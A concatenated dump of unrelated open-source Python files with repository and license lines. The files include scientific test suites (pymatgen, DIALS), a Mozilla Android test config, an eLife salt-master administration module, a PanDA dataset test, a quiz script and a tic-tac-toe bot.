'Molecular charge is not found',
'No input text',
'Bad SCF convergence']
self.assertEqual(qcout.data[-1]["errors"], ans)
def test_qc43_batch_job(self):
filename = os.path.join(test_dir, "qchem43_batch_job.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 2)
self.assertEqual(len(qcout.data[0]["scf_iteration_energies"][0]), 22)
self.assertTrue("pcm_solvent deprecated" in qcout.data[1]["errors"])
def test_output_file_wierd_encoding(self):
filename = os.path.join(test_dir, "ferrocenium_1pos.qcout")
qcout = QcOutput(filename)
self.assertFalse(qcout.data[1]["has_error"])
self.assertEqual(qcout.data[1]["frequencies"][0]["frequency"], -157.11)
def test_homo_lumo_nan_values(self):
filename = os.path.join(test_dir, "homo_lumo_nan_values.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]["has_error"])
def test_ordinal_not_in_range(self):
filename = os.path.join(test_dir, "ordinal_not_in_range.qcout.gz")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 1)
def test_aux_mpi_time_in_the_end_of_job(self):
filename = os.path.join(test_dir, "aux_mpi_time_mol.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 2)
def test_opt(self):
filename = os.path.join(test_dir, "pt_dft_180.0.qcout")
qcout = QcOutput(filename)
qcin = qcout.data[-1]['input']
qcin_ans = '''$molecule
0 1
S 1.82267924 -1.19997629 0.28714109
C 3.20006180 -0.17260711 0.06528466
C 2.82980603 1.10216298 -0.25610036
C 1.41909100 1.26345446 -0.34254814
C 0.71738150 0.10901545 -0.08456145
H 0.93627498 2.19419272 -0.61095402
C -0.71741859 -0.10899254 -0.08455524
S -1.82328469 1.20374179 -0.44105740
C -1.41912820 -1.26343144 0.17343142
C -3.19922829 0.16690023 -0.25767458
C -2.82941826 -1.10493701 0.07562280
H -3.53750269 -1.90709774 0.23645949
H 4.19429620 -0.57452886 0.18632814
H 3.53860725 1.89960515 -0.43610218
H -4.19239866 0.56181917 -0.40716131
H -0.93481970 -2.20399421 0.40193462
$end
$rem
jobtype = opt
exchange = b3lyp
basis = 6-31++g**
max_scf_cycles = 75
mem_static = 100
mem_total = 1500
$end
$opt
CONSTRAINT
tors 4 5 7 9 180.0
ENDCONSTRAINT
$end
'''
self.assertEqual(str(qcin), qcin_ans)
constraint = qcin.params['opt']
constraint_ans = [['tors', 4, 5, 7, 9, 180.0]]
self.assertEqual(constraint, constraint_ans)
if __name__ == "__main__":
unittest.main()
| aykol/pymatgen | pymatgen/io/tests/test_qchem.py | Python | mit | 81,842 |
import os
config = {
"buildbot_json_path": "buildprops.json",
"host_utils_url": "http://talos-remote.pvt.build.mozilla.org/tegra/tegra-host-utils.Linux.742597.zip",
"robocop_package_name": "org.mozilla.roboexample.test",
"device_ip": "127.0.0.1",
"default_sut_port1": "20701",
"default_sut_port2": "20700", # does not prompt for commands
"tooltool_manifest_path": "testing/config/tooltool-manifests/androidx86/releng.manifest",
"tooltool_cache": "/builds/tooltool_cache",
"tooltool_servers": ["http://runtime-binaries.pvt.build.mozilla.org/tooltool/"],
".avds_dir": "/home/cltbld/.android",
"emulator_process_name": "emulator64-x86",
"exes": {
'adb': '/tools/android-sdk18/platform-tools/adb',
'python': '/tools/buildbot/bin/python',
'virtualenv': ['/tools/buildbot/bin/python', '/tools/misc-python/virtualenv.py'],
'tooltool.py': "/tools/tooltool.py",
},
"env": {
"DISPLAY": ":0.0",
"PATH": "%(PATH)s:/tools/android-sdk18/tools:/tools/android-sdk18/platform-tools",
},
"default_actions": [
'clobber',
'read-buildbot-config',
'setup-avds',
'start-emulators',
'download-and-extract',
'create-virtualenv',
'install',
'run-tests',
'stop-emulators',
],
"emulators": [
{
"name": "test-1",
"device_id": "emulator-5554",
"http_port": "8854", # starting http port to use for the mochitest server
"ssl_port": "4454", # starting ssl port to use for the server
"emulator_port": 5554,
"sut_port1": 20701,
"sut_port2": 20700
},
{
"name": "test-2",
"device_id": "emulator-5556",
"http_port": "8856", # starting http port to use for the mochitest server
"ssl_port": "4456", # starting ssl port to use for the server
"emulator_port": 5556,
"sut_port1": 20703,
"sut_port2": 20702
},
{
"name": "test-3",
"device_id": "emulator-5558",
"http_port": "8858", # starting http port to use for the mochitest server
"ssl_port": "4458", # starting ssl port to use for the server
"emulator_port": 5558,
"sut_port1": 20705,
"sut_port2": 20704
},
{
"name": "test-4",
"device_id": "emulator-5560",
"http_port": "8860", # starting http port to use for the mochitest server
"ssl_port": "4460", # starting ssl port to use for the server
"emulator_port": 5560,
"sut_port1": 20707,
"sut_port2": 20706
}
],
"test_suite_definitions": {
"jsreftest": {
"category": "reftest",
"extra_args": ["../jsreftest/tests/jstests.list",
"--extra-profile-file=jsreftest/tests/user.js"]
},
"mochitest-1": {
"category": "mochitest",
"extra_args": ["--total-chunks=2", "--this-chunk=1", "--run-only-tests=androidx86.json"],
},
"mochitest-2": {
"category": "mochitest",
"extra_args": ["--total-chunks=2", "--this-chunk=2", "--run-only-tests=androidx86.json"],
},
"mochitest-gl": {
"category": "mochitest",
"extra_args": ["--test-manifest=gl.json"],
},
"reftest-1": {
"category": "reftest",
"extra_args": ["--total-chunks=3", "--this-chunk=1",
"tests/layout/reftests/reftest.list"]
},
"reftest-2": {
"category": "reftest",
"extra_args": ["--total-chunks=3", "--this-chunk=2",
"tests/layout/reftests/reftest.list"]
},
"reftest-3": {
"category": "reftest",
"extra_args": ["--total-chunks=3", "--this-chunk=3",
"tests/layout/reftests/reftest.list"]
},
"crashtest": {
"category": "reftest",
"extra_args": ["tests/testing/crashtest/crashtests.list"]
},
"xpcshell": {
"category": "xpcshell",
# XXX --manifest is superceded by testing/config/mozharness/android_x86_config.py.
# Remove when Gecko 35 no longer in tbpl.
"extra_args": ["--manifest=tests/xpcshell_android.ini"]
},
"robocop-1": {
"category": "mochitest",
"extra_args": ["--total-chunks=3", "--this-chunk=1", "--robocop-path=../..",
"--robocop-ids=fennec_ids.txt", "--robocop=robocop.ini"],
},
"robocop-2": {
"category": "mochitest",
"extra_args": ["--total-chunks=3", "--this-chunk=2", "--robocop-path=../..",
"--robocop-ids=fennec_ids.txt", "--robocop=robocop.ini"],
},
"robocop-3": {
"category": "mochitest",
"extra_args": ["--total-chunks=3", "--this-chunk=3", "--robocop-path=../..",
"--robocop-ids=fennec_ids.txt", "--robocop=robocop.ini"],
},
}, # end of "test_definitions"
# test harness options are located in the gecko tree
"in_tree_config": "config/mozharness/android_x86_config.py",
"download_minidump_stackwalk": True,
"default_blob_upload_servers": [
"https://blobupload.elasticbeanstalk.com",
],
"blob_uploader_auth_file" : os.path.join(os.getcwd(), "oauth.txt"),
}
| kartikgupta0909/build-mozharness | configs/android/androidx86.py | Python | mpl-2.0 | 5,532 |
"""Tasks we perform on the master server.
See `askmaster.py` for tasks that are run on minions."""
import os, time
import cfn, buildvars, utils
from buildercore.command import remote_sudo, local
from buildercore import core, bootstrap, config, keypair, project, cfngen, context_handler
from buildercore.utils import lmap, exsubdict, mkidx
from decorators import echo_output, requires_aws_stack
from kids.cache import cache as cached
import logging
LOG = logging.getLogger(__name__)
def update(master_stackname=None):
"same as `cfn.update` but also removes any orphaned minion keys"
master_stackname = master_stackname or core.find_master(utils.find_region())
bootstrap.update_stack(master_stackname, service_list=[
'ec2' # master-server should be a self-contained EC2 instance
])
bootstrap.remove_all_orphaned_keys(master_stackname)
#
#
#
def write_missing_keypairs_to_s3():
"uploads any missing ec2 keys to S3 if they're present locally"
remote_keys = keypair.all_in_s3()
local_paths = keypair.all_locally()
local_keys = lmap(os.path.basename, local_paths)
to_upload = set(local_keys).difference(set(remote_keys))
print('remote:', remote_keys)
print('local:', local_keys)
print('to upload:', to_upload)
def write(key):
stackname = os.path.splitext(key)[0]
keypair.write_keypair_to_s3(stackname)
lmap(write, to_upload)
@requires_aws_stack
@echo_output
def download_keypair(stackname):
try:
return keypair.download_from_s3(stackname)
except EnvironmentError as err:
LOG.info(err)
#
#
#
@echo_output
@cached
def server_access():
"""returns True if this builder instance has access to the master server.
access may be available through presence of the master-server's bootstrap user's
identify file OR current user is in master server's allowed_keys list"""
stackname = core.find_master(core.find_region())
public_ip = core.stack_data(stackname, ensure_single_instance=True)[0]['PublicIpAddress']
result = local('ssh -o "StrictHostKeyChecking no" %s@%s "exit"' % (config.BOOTSTRAP_USER, public_ip))
return result['succeeded']
@cached
def _cached_master_ip(master_stackname):
"provides a small time saving when remastering many minions"
return core.stack_data(master_stackname)[0]['PrivateIpAddress']
@requires_aws_stack
def update_salt(stackname):
"updates the Salt version installed on the instances for the given stack"
# start instance if it is stopped
# acquire a lock from Alfred (if possible) so instance isn't shutdown while being updated
cfn._check_want_to_be_running(stackname, autostart=True)
context = context_handler.load_context(stackname)
if not context.get('ec2'):
LOG.info("no ec2 context. skipping stack: %s", stackname)
return
LOG.info("upgrading stack's salt minion")
pdata = core.project_data_for_stackname(stackname)
context['project']['salt'] = pdata['salt']
LOG.info("updating stack's context")
context_handler.write_context(stackname, context)
LOG.info("updating stack's nodes (sequentially)")
bootstrap.update_ec2_stack(stackname, context, concurrency='serial')
return True
def update_salt_master(region=None):
"convenience. update the version of Salt installed on the master-server."
region = region or utils.find_region()
current_master_stackname = core.find_master(region)
return update_salt(current_master_stackname)
@requires_aws_stack
def remaster(stackname, new_master_stackname="master-server--2018-04-09-2"):
"tell minion who their new master is. deletes any existing master key on minion"
# start instance if it is stopped
# acquire a lock from Alfred (if possible) so instance isn't shutdown while being updated
cfn._check_want_to_be_running(stackname, autostart=True)
master_ip = _cached_master_ip(new_master_stackname)
LOG.info('re-mastering %r to %r', stackname, master_ip)
context = context_handler.load_context(stackname)
if not context.get('ec2'):
LOG.info("no ec2 context, skipping %s", stackname)
return
if context['ec2'].get('master_ip') == master_ip:
LOG.info("already remastered: %s", stackname)
return
pdata = core.project_data_for_stackname(stackname)
LOG.info("setting new master address")
cfngen.set_master_address(pdata, context, master_ip) # mutates context
LOG.info("updating context")
context_handler.write_context(stackname, context)
LOG.info("updating buildvars")
buildvars.refresh(stackname, context)
# remove knowledge of old master by destroying the minion's master pubkey
def workerfn():
remote_sudo("rm -f /etc/salt/pki/minion/minion_master.pub")
LOG.info("removing old master key from minion")
core.stack_all_ec2_nodes(stackname, workerfn, username=config.BOOTSTRAP_USER)
LOG.info("updating nodes")
# todo: how to pass in --dry-run to highstate.sh ?
bootstrap.update_ec2_stack(stackname, context, concurrency='serial')
return True
def remaster_all(*pname_list):
"calls `remaster` on *all* projects or just a subset of projects"
# there should only be one master-server instance at a time.
# multiple masters is bad news. assumptions break and it gets complicated quickly.
new_master_stackname = "master-server--2018-04-09-2"
LOG.info('new master is: %s', new_master_stackname)
ec2stacks = project.ec2_projects()
ignore = [
'master-server',
]
ec2stacks = exsubdict(ec2stacks, ignore)
# we can optionally pass in a list of projects to target
# this allows us to partition up the projects and have many of these
# remastering efforts happening concurrently
if pname_list:
more_ignore = [p for p in ec2stacks if p not in pname_list]
ec2stacks = exsubdict(ec2stacks, more_ignore)
pname_list = sorted(ec2stacks.keys()) # lets do this alphabetically
# TODO: skip any stacks without ec2 instances
# only update ec2 instances in the same region as the new master
region = utils.find_region(new_master_stackname)
active_stacks = core.active_stack_names(region)
stack_idx = mkidx(lambda v: core.parse_stackname(v)[0], active_stacks)
def sortbyenv(n):
adhoc = 0 # do these first
order = {
'continuumtest': 1,
'ci': 2,
'end2end': 3,
'prod': 4, # update prod last
}
pname, iid = core.parse_stackname(n)
return order.get(iid, adhoc)
remastered_list = open('remastered.txt', 'r').read().splitlines() if os.path.exists('remastered.txt') else []
for pname in pname_list:
# when would this ever be the case?
# `core.active_stack_names` doesn't discriminate against any list of projects
# it returns *all* steady stack names.
if pname not in stack_idx:
continue
project_stack_list = sorted(stack_idx[pname], key=sortbyenv)
LOG.info("%r instances: %s" % (pname, ", ".join(project_stack_list)))
try:
for stackname in project_stack_list:
try:
if stackname in remastered_list:
LOG.info("already updated, skipping stack: %s", stackname)
continue
LOG.info("*" * 80)
LOG.info("updating: %s" % stackname)
utils.get_input('continue? ctrl-c to quit')
if not remaster(stackname, new_master_stackname):
LOG.warning("failed to remaster %s, stopping further remasters to project %r", stackname, pname)
break
# print a reminder of which stack was just updated
print("\n(%s)\n" % stackname)
open('remastered.txt', 'a').write("%s\n" % stackname)
except KeyboardInterrupt:
LOG.warning("ctrl-c, skipping stack: %s", stackname)
LOG.info("ctrl-c again to exit process entirely")
time.sleep(2)
except BaseException:
LOG.exception("unhandled exception updating stack: %s", stackname)
except KeyboardInterrupt:
LOG.warning("quitting")
break
LOG.info("wrote 'remastered.txt'")
| elifesciences/builder | src/master.py | Python | mit | 8,407 |
import commands
from dataservice.DDM import ddm
#print ddm.DQ2ProductionClient.generateUUID()
#print ddm.DQ2.getFilesFromCatalog('aho.xml')
#print ddm.DQ2ProductionClient.dq2_makeblocks('input.data')
ids=['pandatest.000003.dd.input._00047.junk','09801b0a-9fd0-4237-8caf-a37932c26e39',
'pandatest.000003.dd.input._00050.junk','6dd3d367-4aa3-4e1a-9ac3-9ad14b7311f4',
'pandatest.000003.dd.input._00037.junk','817c2c92-467b-4a1b-9482-f2ec8468cf2e',
'pandatest.000003.dd.input._00021.junk','7720527f-817e-40c7-9e29-ce237f59edfa',
'pandatest.000003.dd.input._00023.junk','5f1f9982-85a3-4d1a-9ee9-f1de22c02544',
'pandatest.000003.dd.input._00042.junk','610cc91a-c731-4bce-ac7a-ff5133e7d18b',
'pandatest.000003.dd.input._00027.junk','bd987478-3c59-4551-b12b-2853bac25613',
'pandatest.000003.dd.input._00032.junk','9d0424f3-7552-4282-92f2-dfe74e9a6c12',
'pandatest.000003.dd.input._00009.junk','dce33d4a-4569-49ee-95c5-b619b161c777',
'pandatest.000003.dd.input._00036.junk','2fc9836b-82d6-41b0-b966-a5c37662172d',
'pandatest.000003.dd.input._00031.junk','65b957e0-5ecc-44bb-a1f9-cccb61ca2d16',
'pandatest.000003.dd.input._00025.junk','be29fe82-17e2-4122-b4c8-f49a0b76c81f',
'pandatest.000003.dd.input._00029.junk','afa4322f-409b-4327-9169-229d8d48ad5a',
'pandatest.000003.dd.input._00013.junk','cf236d3b-45fd-4b58-bdfb-59abc983c886',
'pandatest.000003.dd.input._00020.junk','b02f98da-0138-4b58-89ba-a88f37214a89',
'pandatest.000003.dd.input._00001.junk','12ab5bb9-944e-4e75-bb90-b64c462d4cd8',
'pandatest.000003.dd.input._00001.junk','12ab5bb9-944e-4e75-bb90-b64c462d4cd8',
'pandatest.000003.dd.input._00006.junk','c0a422ad-e9f1-44bb-9539-cfef7e739da2',
'pandatest.000003.dd.input._00034.junk','da670db3-3638-4f06-b650-a9315eb2bd63',
'pandatest.000003.dd.input._00046.junk','2fcef270-2e41-472d-83c0-53749b401b74',
'pandatest.000003.dd.input._00012.junk','5e212fa1-201f-494d-a2b2-420b229b08fc',
'pandatest.000003.dd.input._00044.junk','87c8ebcc-a637-4204-b77b-8219e68b98d7',
'pandatest.000003.dd.input._00030.junk','87ad811f-7d39-43d9-8a13-e117079bb208',
'pandatest.000003.dd.input._00022.junk','6b902506-1ee1-46b1-a105-1521a8c0dbca',
'pandatest.000003.dd.input._00017.junk','2bbed213-943c-41be-b9d7-7d86a309b0b2',
'pandatest.000003.dd.input._00049.junk','8366e269-f9ae-4b9c-bd98-df4027c992c7',
'pandatest.000003.dd.input._00015.junk','f3c5f37c-b4c2-4933-9633-467ba3a7c364',
'pandatest.000003.dd.input._00004.junk','35d66be2-9d21-44a3-96f7-903a7abf4a87',
'pandatest.000003.dd.input._00010.junk','2279ea3e-ebbb-4b19-9a69-9868f0cce694',
'pandatest.000003.dd.input._00040.junk','a847dbbb-4f98-4b5b-b353-e29e3e3b3fd5',
'pandatest.000003.dd.input._00007.junk','abfef002-62ca-4d84-9813-6329764e38bd',
'pandatest.000003.dd.input._00048.junk','52854023-67d8-4a0f-99ac-bb1f0bd1dc98',
'pandatest.000003.dd.input._00016.junk','bddf7441-6ac9-4087-bafe-32e47448cdc1',
'pandatest.000003.dd.input._00041.junk','c76999ba-4cdf-49e9-bfa5-ff3525fbf1ab',
'pandatest.000003.dd.input._00003.junk','4865119e-367f-4dd8-bdff-505bd878dfde',
'pandatest.000003.dd.input._00019.junk','b9fce1fd-8d4c-4fc4-932f-12b13263ca0c',
'pandatest.000003.dd.input._00011.junk','f93a4e08-fd4f-45fc-b324-91ff59555b1c',
'pandatest.000003.dd.input._00018.junk','e4894561-9589-40d8-871b-b57d70564384',
'pandatest.000003.dd.input._00002.junk','58934980-5ab3-4a66-b3da-55f86d4b54bd',
'pandatest.000003.dd.input._00005.junk','5993fe60-bc8c-4fd8-aac1-dfd55700c9c3',
'pandatest.000003.dd.input._00028.junk','6c19e1fc-ee8c-4bae-bd4c-c9e5c73aca27',
'pandatest.000003.dd.input._00033.junk','98f79ba1-1793-4253-aac7-bdf90a51d1ee',
'pandatest.000003.dd.input._00039.junk','33660dd5-7cef-422a-a7fc-6c24cb10deb1',
'pandatest.000003.dd.input._00014.junk','5c0e9ed8-05a6-41c4-8c07-39b2be33ebc1',
'pandatest.000003.dd.input._00008.junk','b0c184d1-5f5e-45a6-9cc8-8b0f20a85463',
'pandatest.000003.dd.input._00038.junk','b9171997-4d2b-4075-b154-579ebe9438fa',
'pandatest.000003.dd.input._00026.junk','89e5bdf1-15de-44ae-a388-06c1e7d7e2fc',
'pandatest.000003.dd.input._00024.junk','c77b77a2-e6d1-4360-8751-19d9fb77e1f1',
'pandatest.000003.dd.input._00043.junk','cc6ac2a1-4616-4551-80a7-d96f79252b64',
'pandatest.000003.dd.input._00045.junk','ddbed17a-6d65-4e8d-890a-21e1eaa3e9d6',
'pandatest.000003.dd.input._00035.junk','8ed1875a-eb90-4906-8fc4-0449d300ddfe'
]
for i in range(1):
datasetName='testDQ.%s' % commands.getoutput('/usr/bin/uuidgen')
print datasetName
#['pandatest.000003.dd.input._00004.junk','35d66be2-9d21-44a3-96f7-903a7abf4a87']
#'pandatest.000003.dd.input._00028.junk','6c19e1fc-ee8c-4bae-bd4c-c9e5c73aca27',
# 'pandatest.000003.dd.input._00033.junk','98f79ba1-1793-4253-aac7-bdf90a51d1ee']
print (['registerNewDataset','-c',datasetName]+ids[i*2:i*2+2])
ddm.DQ2.main(['registerNewDataset','-c',datasetName]+ids[i*2:i*2+2])
'''
status,out = ddm.RepositoryClient.main(['queryDatasetByName',datasetName])
exec "vuids = %s" % out.split('\n')[0]
if vuids.has_key(datasetName):
vuid = vuids[datasetName]
print vuid
status,out = ddm.RepositoryClient.main(['resolveVUID',vuid])
status,out = ddm.DQ2.getFilesFromCatalog('baka.xml')
exec "rets = %s" % out.split('\n')[0]
print rets[0]
exec "ids = %s" % out
print ddm.DQ2.main(['addFilesToDataset',datasetName]+ids)
status,out = ddm.DQ2.main(['listFilesInDataset',datasetName])
print out
'''
print (['registerDatasetLocations','-c',datasetName,'http://dms02.usatlas.bnl.gov/sites/bnl/lrc'])
ddm.DQ2.main(['registerDatasetLocations','-c',datasetName,
'http://dms02.usatlas.bnl.gov/sites/bnl/lrc'])
print (['registerDatasetSubscription',datasetName,'http://doe-dhcp241.bu.edu:8000/dq2/'])
ddm.DQ2.main(['registerDatasetSubscription',datasetName,'http://doe-dhcp241.bu.edu:8000/dq2/'])
#print ddm.DQ2.main(['eraseDataset',datasetName])
#print ddm.DQ2.main(['eraseDataset',datasetName])
#print ddm.DQ2ProductionClient.dq2_create_dataset(datasetName)
#status,out = ddm.DQ2ProductionClient.dq2_assign_destination(datasetName,'BNL_SE')
#print out
#print ddm.DQ2.main(['eraseDataset',datasetName])
#status,out = ddm.DQ2.main(['listFilesInDataset','panda.destDB.11aed982-8079-4db9-964c-37a284b8597a'])
#print out
ddm.DQ2_iter.listFileReplicasBySites('mc11_7TeV.151900.madgraph_SM_SG_SS_direct_1200_600_395.merge.AOD.e1095_a131_s1353_a145_r2993_tid723983_00',
0,['SARA-MATRIX_DATADISK'],
0,300)
| RRCKI/panda-server | pandaserver/test/testDQ.py | Python | apache-2.0 | 6,730 |
# -*- coding: utf-8 -*-
"""
xkbgroup
~~~~~~~~
Use this library to change the keyboard layout through XKB extension
(subsystem) of the X server system.
:copyright: (c) 2016 by Nguyen Duc My.
:license: MIT, see LICENSE for more details.
"""
from .core import XKeyboard, X11Error
| hcpl/xkbgroup | xkbgroup/__init__.py | Python | mit | 305 |
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 10 11:29:03 2016
@author: Bram
"""
import pandas as pan
import codecs
import numpy as np
import os
#Find computer user
user=os.getlogin()
#Fine last session version
fileList=os.listdir("C:/Users/%s/Desktop/QuestionHistCrit/saves" %user)
fileList=sorted(fileList)
lastFile=fileList[-1]
numberFile=[int(s) for s in lastFile.split("_") if s.isdigit()]
numberFile=numberFile[0]
#Open lijst met foute stellingen
f = codecs.open ('C:/Users/%s/Desktop/QuestionHistCrit/vragenlijstFout.txt' %user,'r',"utf-8")
#Omzetting in array
q= pan.DataFrame(columns=['Question','Answer','explanationifFalse','AnswerShort'])
#line1=f.readline()
#f.readline()
#f.readline()
#line2=f.readline()
#f.readline()
#line3=f.readline()
#f.readline()
#f.readline()
#f.readline()
#data={'Question':[line1],'Answer':[line2],'explanationifFalse':[line3]}
#temp= pan.DataFrame(data,columns=['Question','Answer','explanationifFalse'])
#q=q.append(temp)
for x in range(0, 62):
line1=f.readline()
f.readline()
f.readline()
line2=f.readline()
f.readline()
line3=f.readline()
f.readline()
f.readline()
f.readline()
data={'Question':[line1],'Answer':[line2],'explanationifFalse':[line3],'AnswerShort':['f']}
temp= pan.DataFrame(data,columns=['Question','Answer','explanationifFalse','AnswerShort'])
q=q.append(temp)
#Open lijst met juiste stelling in UTF-8 encoding
f = codecs.open ('C:/Users/%s/Desktop/QuestionHistCrit/vragenlijstJuist.txt' %user,'r',"utf-8")
for x in range(0, 93):
line1=f.readline()
f.readline()
f.readline()
data={'Question':[line1],'Answer':['N/A'],'explanationifFalse':['N/A'],'AnswerShort':['t']}
temp= pan.DataFrame(data,columns=['Question','Answer','explanationifFalse','AnswerShort'])
q=q.append(temp)
f.close()
#Re-index from dataframe
q.index=range(len(q))
#Initialising Main loop
counter=1;
score=0;
wrongList=pan.DataFrame(columns=['Question','Answer','explanationifFalse','AnswerShort']);
#Main loop
mode=input("Vorige sessie laden? (y/n): ")
N=int(input("Hoeveel vragen ?: "))
if mode=="y":
q=pan.read_csv("C:/Users/%s/Desktop/QuestionHistCrit/saves/session_%d_.csv" %(user,numberFile) ,encoding="utf-8")
del q["Unnamed: 0"]
while(counter<=N):
randNum=np.random.randint(0,len(q.index))
print(q.iloc[randNum,0])
ans= input(" Answer (t/f): ")
if not ans =='f' or ans =='t':
while not (ans =='f' or ans =='t'):
ans= input(" Answer (t/f): ")
if ans==q.iloc[randNum,3]:
score+=1;
q=q.drop(randNum)
q.index=range(len(q)) #reindex question
print("Right! :D")
else:
wrongList=wrongList.append(q.iloc[randNum,0:4])
print("")
print("")
print("Wrong :(")
print(q.iloc[randNum,1])
print(q.iloc[randNum,2])
input("Press Enter to continue...")
counter +=1;
print("")
print("")
print("Je score is %d / %d" % (score,N) )
#Alle foute samenvoegen bij de niet-gevraagde
numberFile +=1
q.to_csv("C:/Users/%s/Desktop/QuestionHistCrit/saves/session_%d_.csv" %(user,numberFile),encoding="utf-8")
| Beramos/QuestionHistCrit | Questioner.py | Python | cc0-1.0 | 3,231 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ===============================================================
#
# Filename: setup.py
#
# Author: Oxnz
# Email: yunxinyi@gmail.com
# Created: 2015-12-28 09:46:31 CST
# Last-update: 2015-12-28 09:46:31 CST
# Description: ANCHOR
#
# Version: 0.0.1
# Revision: [None]
# Revision history: [None]
# Date Author Remarks: [None]
#
# License:
# Copyright (c) 2015 Oxnz
#
# Distributed under terms of the [LICENSE] license.
# [license]
#
# ===============================================================
#
from distutils.core import setup
from distutils.extension import Extension
__version__ = '0.1'
FastInt = Extension(
'FastInt',
sources = ['FastInt/FastInt.c'],
extra_compile_args = ['-O3', '-std=c99', '-Wall'],
extra_link_args = [],
)
setup(
name = __name__,
version = __version__,
ext_modules = [FastInt],
)
| oxnz/work-stuff | logparse/setup.py | Python | mit | 935 |
from __future__ import print_function
import numpy, plots, math, operator, copy
COPY = copy.deepcopy
# define a post-processing operation that always remembers the last data set and
# computes statistical differences between that one and the next data set.
# After that, the new data set becomes the last one.
# Purpose: to verify that two chunks of data extraced from measurement sets that *should*
# be equal, are, in fact, equal.
# If a new type of data set is detected (new plot type) the last data set is erased,
# this data set becomes the stored one, and no output is generated
last_dataset = None
tolerance = 1e-7
def plotar2unidict(plotar):
rv = plots.Dict()
rv.plotType = plotar.plotType
# loop over all plots and datasets-within-plot
for k in plotar.keys():
for d in plotar[k].keys():
# get the full data set label - we have access to all the data set's properties (FQ, SB, POL etc)
n = plots.join_label(k, d)
# and make a copy of the dataset
rv[n] = COPY( plotar[k][d] )
return rv
# this is the function to pass to `postprocess ...`
def compare_data(plotar, ms2mappings):
global last_dataset
# Whatever we need to do - this can be done unconditionally
new_dataset = plotar2unidict( plotar )
error = ""
# Check if we need to do anything at all
if last_dataset is not None and last_dataset.plotType == new_dataset.plotType:
# OK check all common keys
old_keys = set(last_dataset.keys())
new_keys = set(new_dataset.keys())
# if the sets are not equal, the data will also not compare equal!
if old_keys == new_keys:
# inspect x and y separately, add up all the diffs
dx, dy = 0, 0
for k in old_keys:
ods = last_dataset[ k ]
nds = new_dataset[ k ]
dx = numpy.add(numpy.abs( ods.xval - nds.xval ), dx)
dy = numpy.add(numpy.abs( ods.yval - nds.yval ), dy)
if numpy.any( dx>abs(tolerance) ):
print(">>> compare_data: total diffs in x exceed tolerance")
print(" tolerance=", tolerance)
print(" accum. dx=", dx)
error += "Datasets mismatch in X according to tolerance. "
if numpy.any( dy>abs(tolerance) ):
print(">>> compare_data: total diffs in y exceed tolerance")
print(" tolerance=", tolerance)
print(" accum. dy=", dy)
error = "Datasets mismatch in Y according to tolerance. "
else:
print(">>> compare_data: The datasets to compare have different data content?!")
common = old_keys & new_keys
only_o = old_keys - common
only_n = new_keys - common
print(" Common keys:", len(common))
print(" Uniq in Old:", len(only_o))
print(" Uniq in New:", len(only_n))
error += "Datasets mismatch in content. "
#with open('/tmp/oldkeys.txt', 'w') as f:
# list( map(lambda s: f.write(str(s) + '\n'), sorted(only_o)) )
#with open('/tmp/newkeys.txt', 'w') as f:
# list( map(lambda s: f.write(str(s) + '\n'), sorted(only_n)) )
# Install new dataset as new last dataset
last_dataset = new_dataset
if error:
raise RuntimeError(error)
| haavee/jiveplot | postprocessing/compare_data.py | Python | gpl-3.0 | 3,436 |
import random
BOARD = ['a1', 'a2', 'a3', 'b1', 'b2', 'b3', 'c1', 'c2', 'c3']
def play_turn(
player_role,
owned_by_x,
owned_by_zero
):
available_squares = list( set(BOARD) - set(owned_by_x) - set(owned_by_zero) )
return random.choice(available_squares)
| rosedu/I.GameBot | tictactoe/game_bots/random_bot_02_python/tictactoe_play_turn.py | Python | agpl-3.0 | 293 |
from __future__ import annotations
def test_run(dials_regression, run_in_tmpdir):
from os.path import join
from dxtbx.model.experiment_list import ExperimentListFactory
from dials.array_family import flex
from dials.command_line.export import phil_scope
from dials.util.nexus import dump, load
path = join(dials_regression, "nexus_test_data")
# Read the experiments
experiments1 = ExperimentListFactory.from_json_file(
join(path, "refined_experiments.json")
)
# Read the reflections
reflections1 = flex.reflection_table.from_file(join(path, "integrated.pickle"))
# Delete some columns for the test
del reflections1["s1"]
del reflections1["zeta"]
del reflections1["background.mse"]
# Dump the reflections
params = phil_scope.extract()
params.nxs.hklout = "hklout.nxs"
dump(experiments1, reflections1, params.nxs)
# Load them again
experiments2, reflections2 = load("hklout.nxs")
EPS = 1e-7
# Check the reflections are OK
assert reflections1.nrows() == reflections2.nrows()
assert reflections1.ncols() == reflections2.ncols()
for key in reflections1.keys():
data1 = reflections1[key]
data2 = reflections2[key]
assert data1.__class__ == data2.__class__
if isinstance(data1, flex.double):
assert data1.all_approx_equal(data2)
elif isinstance(data1, flex.int6):
for p1, p2 in zip(data1.parts(), data2.parts()):
assert p1.all_eq(p2)
elif isinstance(data1, flex.vec3_double):
for p1, p2 in zip(data1.parts(), data2.parts()):
assert p1.all_approx_equal(p2)
else:
assert data1.all_eq(data2)
# Test passed
# Check the experiments are ok
assert len(experiments1) == len(experiments2)
exp1 = experiments1[0]
exp2 = experiments2[0]
# Check the beam
b1 = exp1.beam
b2 = exp2.beam
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(
b1.get_sample_to_source_direction(), b2.get_sample_to_source_direction()
)
)
assert abs(b1.get_wavelength() - b2.get_wavelength()) < EPS
assert abs(b1.get_polarization_fraction() - b2.get_polarization_fraction()) < EPS
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(b1.get_polarization_normal(), b2.get_polarization_normal())
)
# Check the goniometer
g1 = exp1.goniometer
g2 = exp2.goniometer
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(g1.get_rotation_axis(), g2.get_rotation_axis())
)
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(g1.get_fixed_rotation(), g2.get_fixed_rotation())
)
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(g1.get_setting_rotation(), g2.get_setting_rotation())
)
# Check the scan
s1 = exp1.scan
s2 = exp2.scan
assert len(s1) == len(s2)
assert s1.get_image_range() == s2.get_image_range()
assert abs(s1.get_oscillation()[0] - s1.get_oscillation()[0]) < EPS
assert abs(s1.get_oscillation()[1] - s1.get_oscillation()[1]) < EPS
for e1, e2 in zip(s1.get_exposure_times(), s2.get_exposure_times()):
assert abs(e1 - e2) < EPS
